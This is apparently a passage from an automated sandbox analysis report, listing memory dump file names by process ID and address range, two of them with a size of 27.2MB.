memory/4324-147-0x0000000000000000-mapping.dmp
-
memory/4492-182-0x0000000000000000-mapping.dmp
-
memory/4552-191-0x0000000000000000-mapping.dmp
-
memory/4692-210-0x0000000000000000-mapping.dmp
-
memory/4692-178-0x0000000000000000-mapping.dmp
-
memory/4712-157-0x0000000000000000-mapping.dmp
-
memory/4728-193-0x0000000000000000-mapping.dmp
-
memory/4776-184-0x0000000000000000-mapping.dmp
-
memory/4828-183-0x0000000000000000-mapping.dmp
-
memory/4856-180-0x0000000000000000-mapping.dmp
-
memory/4856-228-0x0000000140000000-0x0000000141B39000-memory.dmpFilesize
27.2MB
-
memory/4856-227-0x0000000140000000-0x0000000141B39000-memory.dmpFilesize
27.2MB
-
memory/5000-151-0x0000000000000000-mapping.dmp
-
memory/5000-186-0x0000000000000000-mapping.dmp
-
memory/5116-172-0x0000000000000000-mapping.dmp